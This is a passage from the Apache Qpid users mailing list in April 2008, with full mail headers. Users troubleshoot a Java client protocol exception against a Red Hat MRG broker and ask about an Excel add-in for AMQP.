worked...but there should be a simple modification with your reply. > > set QPID_HOME to > distribution/target/qpid-1.0-incubating-M3-SNAPSHOT/ and PATH > to $QPID_HOME/bin:$PATH and it should work. > Thanks a lot. Regs lahiru ------=_Part_9198_24493309.1208874379105-- From [email protected] Thu Apr 24 00:32:50 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99586 invoked from network); 24 Apr 2008 00:32:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Apr 2008 00:32:50 -0000 Received: (qmail 33219 invoked by uid 500); 24 Apr 2008 00:32:52 -0000 Delivered-To: [email protected] Received: (qmail 33157 invoked by uid 500); 24 Apr 2008 00:32:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33146 invoked by uid 99); 24 Apr 2008 00:32:51 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 23 Apr 2008 17:32:51 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO FPNYEXCBE02.opus-i.corp) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 24 Apr 2008 00:32:08 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: java.lang.RuntimeException: expecting '41', got 'f' Date: Wed, 23 Apr 2008 20:32:16 -0400 Message-ID: <[email protected]> In-Reply-To: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: java.lang.RuntimeException: expecting '41', got 'f' thread-index: AcijLR/+n4O76o7/TDyLk1pH2w3a+ACdUABw References: <[email protected]> From: "Shahbaz Chaudhary" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Thanks, I'll try the trunk versions of server and client...checked out the client version from qpid because I wanted to avoid JMS and use an amq specific java api. Does redhat simply package up qpid's code in rpm format or do they add their own extensions to it? In other words, other than package management and integration with start-up services, is there a difference in the code? -----Original Message----- From: Shahbaz Chaudhary [mailto:[email protected]]=20 Sent: Sunday, April 20, 2008 5:26 PM To: [email protected] Subject: java.lang.RuntimeException: expecting '41', got 'f' Hi, I'm trying to run some example programs for qpid. =20 There server is the RedHat packaged RHMD from their mrg-beta yum repository (which I believe is just the latest version of qpid server), and the client is TopicPublisher (and TopicListener) from Qpid's svn repository (head-I believe it is considered to be the M3 version). =20 All I have done is take org.apache.qpid.example.amqpexample.pubsub.TopicPublisher (and TopicListener), brought it into eclipse, change the package name to reflect my own directory structure and changed =20 con.connect("localhost", 5672, "test", "guest", "guest"); =20 from localhost to my own server. =20 When I run the file, I get the following run time exception: =20 16:58:58,933 [SocketConnectorIoProcessor-0.0] WARN MinaHandler - [/xxx.xxx.xxx.xxx:5672] Unexpected exception from exceptionCaught handler. java.lang.RuntimeException: connection closed at org.apache.qpidity.nclient.Client$1.exception(Client.java:76) at org.apache.qpidity.transport.Connection.exception(Connection.java:115) at org.apache.qpidity.transport.network.Assembler.exception(Assembler.java: 105) at org.apache.qpidity.transport.network.InputHandler.exception(InputHandler .java:250) at org.apache.qpidity.transport.network.mina.MinaHandler.exceptionCaught(Mi naHandler.java:85) at org.apache.mina.common.support.AbstractIoFilterChain$TailFilter.exceptio nCaught(AbstractIoFilterChain.java:695) at org.apache.mina.common.support.AbstractIoFilterChain.callNextExceptionCa ught(AbstractIoFilterChain.java:423) at org.apache.mina.common.support.AbstractIoFilterChain.access$1000(Abstrac tIoFilterChain.java:54) at org.apache.mina.common.support.AbstractIoFilterChain$EntryImpl$1.excepti onCaught(AbstractIoFilterChain.java:794) at org.apache.mina.common.support.AbstractIoFilterChain$HeadFilter.exceptio nCaught(AbstractIoFilterChain.java:611) at org.apache.mina.common.support.AbstractIoFilterChain.callNextExceptionCa ught(AbstractIoFilterChain.java:423) at org.apache.mina.common.support.AbstractIoFilterChain.fireExceptionCaught (AbstractIoFilterChain.java:407) at org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece ived(AbstractIoFilterChain.java:366) at org.apache.mina.common.support.AbstractIoFilterChain.access$1100(Abstrac tIoFilterChain.java:54) at org.apache.mina.common.support.AbstractIoFilterChain$EntryImpl$1.message Received(AbstractIoFilterChain.java:800) at org.apache.mina.common.support.AbstractIoFilterChain$HeadFilter.messageR eceived(AbstractIoFilterChain.java:617) at org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece ived(AbstractIoFilterChain.java:362) at org.apache.mina.common.support.AbstractIoFilterChain.fireMessageReceived (AbstractIoFilterChain.java:353) at org.apache.mina.transport.socket.nio.SocketIoProcessor.read(SocketIoProc essor.java:246) at org.apache.mina.transport.socket.nio.SocketIoProcessor.process(SocketIoP rocessor.java:206) at org.apache.mina.transport.socket.nio.SocketIoProcessor.access$500(Socket IoProcessor.java:44) at org.apache.mina.transport.socket.nio.SocketIoProcessor$Worker.run(Socket IoProcessor.java:506) at org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.j ava:43) at java.lang.Thread.run(Unknown Source) Caused by: java.lang.RuntimeException: expecting '41', got 'f' at org.apache.qpidity.transport.Channel.error(Channel.java:116) at org.apache.qpidity.transport.Channel.error(Channel.java:41) at org.apache.qpidity.transport.ProtocolError.delegate(ProtocolError.java:5 9) at org.apache.qpidity.transport.Channel.received(Channel.java:72) at org.apache.qpidity.transport.Connection.received(Connection.java:82) at org.apache.qpidity.transport.Connection.received(Connection.java:43) at org.apache.qpidity.transport.network.Assembler.emit(Assembler.java:90) at org.apache.qpidity.transport.network.Assembler.error(Assembler.java:134) at org.apache.qpidity.transport.ProtocolError.delegate(ProtocolError.java:6 4) at org.apache.qpidity.transport.network.Assembler.received(Assembler.java:1 00) at org.apache.qpidity.transport.network.Assembler.received(Assembler.java:4 9) at org.apache.qpidity.transport.network.InputHandler.error(InputHandler.jav a:111) at org.apache.qpidity.transport.network.InputHandler.expect(InputHandler.ja va:243) at org.apache.qpidity.transport.network.InputHandler.expect(InputHandler.ja va:234) at org.apache.qpidity.transport.network.InputHandler.next(InputHandler.java :126) at org.apache.qpidity.transport.network.InputHandler.received(InputHandler. java:118) at org.apache.qpidity.transport.network.InputHandler.received(InputHandler. java:41) at org.apache.qpidity.transport.network.mina.MinaHandler.messageReceived(Mi naHandler.java:74) at org.apache.mina.common.support.AbstractIoFilterChain$TailFilter.messageR eceived(AbstractIoFilterChain.java:703) at org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece ived(AbstractIoFilterChain.java:362) ... 11 more =20 Any idea what could be causing this? =20 Thanks =20 -Shahbaz =20 From [email protected] Thu Apr 24 00:59:33 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9875 invoked from network); 24 Apr 2008 00:59:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Apr 2008 00:59:33 -0000 Received: (qmail 48081 invoked by uid 500); 24 Apr 2008 00:59:35 -0000 Delivered-To: [email protected] Received: (qmail 48063 invoked by uid 500); 24 Apr 2008 00:59:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48052 invoked by uid 99); 24 Apr 2008 00:59:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 23 Apr 2008 17:59:34 -0700 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mx1.redhat.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 24 Apr 2008 00:58:43 +0000 Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [161.129.204.104]) by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m3O0x3I8017726 for <[email protected]>; Wed, 23 Apr 2008 20:59:03 -0400 Received: from mail.boston.redhat.com (mail.boston.redhat.com [161.129.204.104]) by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m3O0x3Cm030708 for <[email protected]>; Wed, 23 Apr 2008 20:59:03 -0400 Received: from localhost.localdomain (vpn-248-65.boston.redhat.com [161.129.204.104]) by mail.boston.redhat.com (8.13.1/8.13.1) with ESMTP id m3O0wxjW017803 for <[email protected]>; Wed, 23 Apr 2008 20:58:59 -0400 Message-ID: <[email protected]> Date: Wed, 23 Apr 2008 20:57:06 -0400 From: Carl Trieloff <[email protected]> Reply-To: [email protected] Organization: Red Hat User-Agent: Thunderbird 161.129.204.104 (X11/20080226) MIME-Version: 1.0 To: [email protected] Subject: Re: java.lang.RuntimeException: expecting '41', got 'f' References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Scanned-By: MIMEDefang 2.58 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org Shahbaz Chaudhary wrote: > Thanks, I'll try the trunk versions of server and client...checked out > the client version from qpid because I wanted to avoid JMS and use an > amq specific java api. > > Does redhat simply package up qpid's code in rpm format or do they add > their own extensions to it? In other words, other than package > management and integration with start-up services, is there a difference > in the code? > There are some extra plug-ins, components, config in MRG + supported build + patches that need to be back ported etc. As you indicate the Beta repo is closer to what would be Qpid M3, and AMQP 0-10. One thing to note is for the next few weeks, that repo and trunk are not fully compat as Qpid closes the last few issues to become 100% AMQP 0-10 compliant. pick one or the other for the next week or two. I will let someone that know the Java client better than I do respond to the trace below. Carl. > -----Original Message----- > From: Shahbaz Chaudhary [mailto:[email protected]] > Sent: Sunday, April 20, 2008 5:26 PM > To: [email protected] > Subject: java.lang.RuntimeException: expecting '41', got 'f' > > Hi, > > I'm trying to run some example programs for qpid. > > > > There server is the RedHat packaged RHMD from their mrg-beta yum > repository (which I believe is just the latest version of qpid server), > and the client is TopicPublisher (and TopicListener) from Qpid's svn > repository (head-I believe it is considered to be the M3 version). > > > > All I have done is take > org.apache.qpid.example.amqpexample.pubsub.TopicPublisher (and > TopicListener), brought it into eclipse, change the package name to > reflect my own directory structure and changed > > > > con.connect("localhost", 5672, "test", "guest", "guest"); > > > > from localhost to my own server. > > > > When I run the file, I get the following run time exception: > > > > 16:58:58,933 [SocketConnectorIoProcessor-0.0] WARN MinaHandler - > [/xxx.xxx.xxx.xxx:5672] Unexpected exception from exceptionCaught > handler. > > java.lang.RuntimeException: connection closed > > at org.apache.qpidity.nclient.Client$1.exception(Client.java:76) > > at > org.apache.qpidity.transport.Connection.exception(Connection.java:115) > > at > org.apache.qpidity.transport.network.Assembler.exception(Assembler.java: > 105) > > at > org.apache.qpidity.transport.network.InputHandler.exception(InputHandler > .java:250) > > at > org.apache.qpidity.transport.network.mina.MinaHandler.exceptionCaught(Mi > naHandler.java:85) > > at > org.apache.mina.common.support.AbstractIoFilterChain$TailFilter.exceptio > nCaught(AbstractIoFilterChain.java:695) > > at > org.apache.mina.common.support.AbstractIoFilterChain.callNextExceptionCa > ught(AbstractIoFilterChain.java:423) > > at > org.apache.mina.common.support.AbstractIoFilterChain.access$1000(Abstrac > tIoFilterChain.java:54) > > at > org.apache.mina.common.support.AbstractIoFilterChain$EntryImpl$1.excepti > onCaught(AbstractIoFilterChain.java:794) > > at > org.apache.mina.common.support.AbstractIoFilterChain$HeadFilter.exceptio > nCaught(AbstractIoFilterChain.java:611) > > at > org.apache.mina.common.support.AbstractIoFilterChain.callNextExceptionCa > ught(AbstractIoFilterChain.java:423) > > at > org.apache.mina.common.support.AbstractIoFilterChain.fireExceptionCaught > (AbstractIoFilterChain.java:407) > > at > org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece > ived(AbstractIoFilterChain.java:366) > > at > org.apache.mina.common.support.AbstractIoFilterChain.access$1100(Abstrac > tIoFilterChain.java:54) > > at > org.apache.mina.common.support.AbstractIoFilterChain$EntryImpl$1.message > Received(AbstractIoFilterChain.java:800) > > at > org.apache.mina.common.support.AbstractIoFilterChain$HeadFilter.messageR > eceived(AbstractIoFilterChain.java:617) > > at > org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece > ived(AbstractIoFilterChain.java:362) > > at > org.apache.mina.common.support.AbstractIoFilterChain.fireMessageReceived > (AbstractIoFilterChain.java:353) > > at > org.apache.mina.transport.socket.nio.SocketIoProcessor.read(SocketIoProc > essor.java:246) > > at > org.apache.mina.transport.socket.nio.SocketIoProcessor.process(SocketIoP > rocessor.java:206) > > at > org.apache.mina.transport.socket.nio.SocketIoProcessor.access$500(Socket > IoProcessor.java:44) > > at > org.apache.mina.transport.socket.nio.SocketIoProcessor$Worker.run(Socket > IoProcessor.java:506) > > at > org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.j > ava:43) > > at java.lang.Thread.run(Unknown Source) > > Caused by: java.lang.RuntimeException: expecting '41', got 'f' > > at org.apache.qpidity.transport.Channel.error(Channel.java:116) > > at org.apache.qpidity.transport.Channel.error(Channel.java:41) > > at > org.apache.qpidity.transport.ProtocolError.delegate(ProtocolError.java:5 > 9) > > at org.apache.qpidity.transport.Channel.received(Channel.java:72) > > at > org.apache.qpidity.transport.Connection.received(Connection.java:82) > > at > org.apache.qpidity.transport.Connection.received(Connection.java:43) > > at > org.apache.qpidity.transport.network.Assembler.emit(Assembler.java:90) > > at > org.apache.qpidity.transport.network.Assembler.error(Assembler.java:134) > > at > org.apache.qpidity.transport.ProtocolError.delegate(ProtocolError.java:6 > 4) > > at > org.apache.qpidity.transport.network.Assembler.received(Assembler.java:1 > 00) > > at > org.apache.qpidity.transport.network.Assembler.received(Assembler.java:4 > 9) > > at > org.apache.qpidity.transport.network.InputHandler.error(InputHandler.jav > a:111) > > at > org.apache.qpidity.transport.network.InputHandler.expect(InputHandler.ja > va:243) > > at > org.apache.qpidity.transport.network.InputHandler.expect(InputHandler.ja > va:234) > > at > org.apache.qpidity.transport.network.InputHandler.next(InputHandler.java > :126) > > at > org.apache.qpidity.transport.network.InputHandler.received(InputHandler. > java:118) > > at > org.apache.qpidity.transport.network.InputHandler.received(InputHandler. > java:41) > > at > org.apache.qpidity.transport.network.mina.MinaHandler.messageReceived(Mi > naHandler.java:74) > > at > org.apache.mina.common.support.AbstractIoFilterChain$TailFilter.messageR > eceived(AbstractIoFilterChain.java:703) > > at > org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece > ived(AbstractIoFilterChain.java:362) > > ... 11 more > > > > Any idea what could be causing this? > > > > Thanks > > > > -Shahbaz > > > > From [email protected] Fri Apr 25 03:00:41 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85918 invoked from network); 25 Apr 2008 03:00:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Apr 2008 03:00:41 -0000 Received: (qmail 68261 invoked by uid 500); 25 Apr 2008 03:00:42 -0000 Delivered-To: [email protected] Received: (qmail 68243 invoked by uid 500); 25 Apr 2008 03:00:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68231 invoked by uid 99); 25 Apr 2008 03:00:42 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 24 Apr 2008 20:00:42 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO FPNYEXCBE02.opus-i.corp) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 02:59:50 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable x-cr-hashedpuzzle: Bbe0 BbnH Bncb CZxH Camq DCBS EbuL E9oV F/dK GUOB GmhQ GtCK JLNU LNMc LxtY L9pt;1;cQBwAGkAZAAtAHUAcwBlAHIAcwBAAGkAbgBjAHUAYgBhAHQAbwByAC4AYQBwAGEAYwBoAGUALgBvAHIAZwA=;Sosha1_v1;7;{36FD5BBF-80DC-4401-9B5E-148892A9D969};cwBjAGgAYQB1AGQAaABhAHIAeQBAAG0AYQByAGMAbwBwAG8AbABvAG4AZQB0AHcAbwByAGsALgBjAG8AbQA=;Fri, 25 Apr 2008 02:59:54 GMT;RQB4AGMAZQBsACAAKABSAFQARAApACAAYQBkAGQALQBpAG4APwA= x-cr-puzzleid: {36FD5BBF-80DC-4401-9B5E-148892A9D969} Content-class: urn:content-classes:message Subject: Excel (RTD) add-in? Date: Thu, 24 Apr 2008 22:59:54 -0400 Message-ID: <[email protected]> In-Reply-To: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Excel (RTD) add-in? thread-index: AcilpnafgN1TFyxoScOiCedRMVUzNwA2X8Nw References: <[email protected]> <[email protected]> <[email protected]> From: "Shahbaz Chaudhary" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org I'm surprised to see that there isn't an Excel add-in yet for Qpid or any other AMQP implementation. Are there any plans to develop one? Such an add-in would be fantastically useful! Hopefully some COM programmers will take note :) From [email protected] Fri Apr 25 07:25:52 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3512 invoked from network); 25 Apr 2008 07:25:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Apr 2008 07:25:52 -0000 Received: (qmail 70253 invoked by uid 500); 25 Apr 2008 07:25:52 -0000 Delivered-To: [email protected] Received: (qmail 70237 invoked by uid 500); 25 Apr 2008 07:25:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70226 invoked by uid 99); 25 Apr 2008 07:25:52 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 00:25:52 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yw-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 07:25:06 +0000 Received: by yw-out-1718.google.com with SMTP id 4so1613222ywq.0 for <[email protected]>; Fri, 25 Apr 2008 00:25:15 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; bh=023xouc+5Oo8KdwZvk7CdRL6wP1rG1lwUSCnOxlMsNA=; b=sFVSFRSiRKmk5BT2+31xlyxVyKSvnPddGOgCK6wm+PfLGElnN4RzpN1WeeYhs3skkZwyJF6ZgkgiTtLsUwKDXdJwnpLwzIGW/q3mvq9puVyFBAC3/xeUfgTCVszh6c5gMfqs60r4n5MIHAlwlgaEV9kcvzvoBtoWyQA79ImDVy4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=x6L1is2knTEM6Vgyazb4X+TDmv0UBtTmRreudaKKpjv0ljCqxZ8rnofJ7s2fAl5BOmBgMhe4+J9U0QKuqQmn9nrcAT2Aoon1UiMym4o6MRSVUO44xQsHzsnb3MItcv8dlv3EgWXpGznvzP2Dflt1bKIdDoY9el5xyV2mxLLlVLk= Received: by 161.129.204.104 with SMTP id g42mr220361ybb.198.1209108315446; Fri, 25 Apr 2008 00:25:15 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 25 Apr 2008 00:25:15 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 25 Apr 2008 08:25:15 +0100 From: "Robert Greig" <[email protected]> To: [email protected] Subject: Re: Excel (RTD) add-in? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 25/04/2008, Shahbaz Chaudhary <[email protected]> wrote: > I'm surprised to see that there isn't an Excel add-in yet for Qpid or > any other AMQP implementation. Are there any plans to develop one? There is a Qpid .NET client, which can be easily used from within Excel. There is also a WCF client produced by Rabbit (http://www.rabbitmq.com/dotnet.html). Would either of those meet your requirements? Robert From [email protected] Fri Apr 25 08:34:18 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26793 invoked from network); 25 Apr 2008 08:34:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Apr 2008 08:34:18 -0000 Received: (qmail 30006 invoked by uid 500); 25 Apr 2008 08:34:20 -0000 Delivered-To: [email protected] Received: (qmail 29979 invoked by uid 500); 25 Apr 2008 08:34:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29968 invoked by uid 99); 25 Apr 2008 08:34:20 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 01:34:19 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 08:33:33 +0000 Received: by an-out-0708.google.com with SMTP id b33so874045ana.83 for <[email protected]>; Fri, 25 Apr 2008 01:33:46 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; bh=H7U0u9S0uqcR4CNOwHQ2p5K6mtQw1rLM3EWLNAeDaoc=; b=oYETB1vYSTtfTjKkNxMPtPZwNSfpS5DjuaBeavMUgjUlVSiFpRCmIxS1EAbToec2yZ2MyjSpEdLnIvpDp75Bj5nZQfX/YeSe+7hJIiFY1OTUqUP36+UzAZVqPNExtPMpyfXEeUtP9bRe4/y4GBnUPDgugkV0ds4M9vtaq5xgUxo= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=uUyWxenS2aOnw/k770Om7d/5fkBYV39OzRjI51Zc3PXAZt4/zeNnyq/T/bC0zZgcPY4woibj5/QZzy8ZI1Wyg7ActX5OInD7Hr8FTjBGD48/IMHOTW8rzTwAhu8LDgzyKFhGY5QPM2MPHqHvMu2bC1PaNGwuoV8FFvntkyP9SPE= Received: by 161.129.204.104 with SMTP id a6mr7074776ane.119.1209112426174; Fri, 25 Apr 2008 01:33:46 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 25 Apr 2008 01:33:46 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 25 Apr 2008 09:33:46 +0100 From: "Martin Ritchie" <[email protected]> Sender: [email protected] To: [email protected], [email protected] Subject: Re: java.lang.RuntimeException: expecting '41', got 'f' In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Google-Sender-Auth: 541611e00f7bbb15 X-Virus-Checked: Checked by ClamAV on apache.org On 24/04/2008, Carl Trieloff <[email protected]> wrote: > Shahbaz Chaudhary wrote: > > > Thanks, I'll try the trunk versions of server and client...checked out > > the client version from qpid because I wanted to avoid JMS and use an > > amq specific java api. > > > > Does redhat simply package up qpid's code in rpm format or do they add > > their own extensions to it? In other words, other than package > > management and integration with start-up services, is there a difference > > in the code? > > > > > > There are some extra plug-ins, components, config in MRG + supported build > + > patches that need to be back ported etc. As you indicate the Beta repo is > closer to what would be Qpid M3, and AMQP 0-10. > > One thing to note is for the next few weeks, that repo and trunk are not > fully compat > as Qpid closes the last few issues to become 100% AMQP 0-10 compliant. pick > one > or the other for the next week or two. > > I will let someone that know the Java client better than I do respond to > the trace below. > > Carl. Shahbaz, Don't forget the RH Messaging product has its own list [email protected] who should know the exact details of its relationship to Qpid. -- Martin Ritchie > > -----Original Message----- > > From: Shahbaz Chaudhary [mailto:[email protected]] Sent: > Sunday, April 20, 2008 5:26 PM > > To: [email protected] > > Subject: java.lang.RuntimeException: expecting '41', got 'f' > > > > Hi, > > > > I'm trying to run some example programs for qpid. > > > > > > There server is the RedHat packaged RHMD from their mrg-beta yum > > repository (which I believe is just the latest version of qpid server), > > and the client is TopicPublisher (and TopicListener) from Qpid's svn > > repository (head-I believe it is considered to be the M3 version). > > > > > > All I have done is take > > > org.apache.qpid.example.amqpexample.pubsub.TopicPublisher > (and > > TopicListener), brought it into eclipse, change the package name to > > reflect my own directory structure and changed > > > > > > con.connect("localhost", 5672, "test", "guest", "guest"); > > > > > > from localhost to my own server. > > > > > > When I run the file, I get the following run time exception: > > > > > > 16:58:58,933 [SocketConnectorIoProcessor-0.0] WARN > MinaHandler - > > [/xxx.xxx.xxx.xxx:5672] Unexpected exception from exceptionCaught > > handler. > > > > java.lang.RuntimeException: connection closed > > > > at > org.apache.qpidity.nclient.Client$1.exception(Client.java:76) > > > > at > > > org.apache.qpidity.transport.Connection.exception(Connection.java:115) > > > > at > > > org.apache.qpidity.transport.network.Assembler.exception(Assembler.java: > > 105) > > > > at > > > org.apache.qpidity.transport.network.InputHandler.exception(InputHandler > > .java:250) > > > > at > > > org.apache.qpidity.transport.network.mina.MinaHandler.exceptionCaught(Mi > > naHandler.java:85) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain$TailFilter.exceptio > > nCaught(AbstractIoFilterChain.java:695) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain.callNextExceptionCa > > ught(AbstractIoFilterChain.java:423) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain.access$1000(Abstrac > > tIoFilterChain.java:54) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain$EntryImpl$1.excepti > > onCaught(AbstractIoFilterChain.java:794) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain$HeadFilter.exceptio > > nCaught(AbstractIoFilterChain.java:611) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain.callNextExceptionCa > > ught(AbstractIoFilterChain.java:423) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain.fireExceptionCaught > > (AbstractIoFilterChain.java:407) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece > > ived(AbstractIoFilterChain.java:366) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain.access$1100(Abstrac > > tIoFilterChain.java:54) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain$EntryImpl$1.message > > Received(AbstractIoFilterChain.java:800) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain$HeadFilter.messageR > > eceived(AbstractIoFilterChain.java:617) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece > > ived(AbstractIoFilterChain.java:362) > > > > at > > > org.apache.mina.common.support.AbstractIoFilterChain.fireMessageReceived > > (AbstractIoFilterChain.java:353) > > > > at > > > org.apache.mina.transport.socket.nio.SocketIoProcessor.read(SocketIoProc > > essor.java:246) > > > > at > > > org.apache.mina.transport.socket.nio.SocketIoProcessor.process(SocketIoP > > rocessor.java:206) > > > > at > > > org.apache.mina.transport.socket.nio.SocketIoProcessor.access$500(Socket > > IoProcessor.java:44) > > > > at > > > org.apache.mina.transport.socket.nio.SocketIoProcessor$Worker.run(Socket > > IoProcessor.java:506) > > > > at > > > org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.j > > ava:43) > > > > at java.lang.Thread.run(Unknown Source) > > > > Caused by: java.lang.RuntimeException: expecting '41', got 'f' > > > > at > 